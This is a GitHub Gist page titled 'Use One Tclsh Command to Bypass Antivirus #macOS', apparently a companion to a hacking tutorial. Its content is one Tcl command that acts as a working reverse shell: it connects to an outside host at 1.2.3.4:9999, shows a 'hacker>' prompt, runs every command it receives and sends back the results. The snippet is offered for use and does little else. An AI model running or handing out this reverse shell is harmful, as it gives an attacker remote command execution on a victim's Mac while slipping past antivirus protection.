Skip to content

Instantly share code, notes, and snippets.

@tokyoneon
Created April 20, 2019 08:10
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save tokyoneon/e4259e2e6287a27487fe78624eccfd0c to your computer and use it in GitHub Desktop.
Save tokyoneon/e4259e2e6287a27487fe78624eccfd0c to your computer and use it in GitHub Desktop.
Use One Tclsh Command to Bypass Antivirus #macOS
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment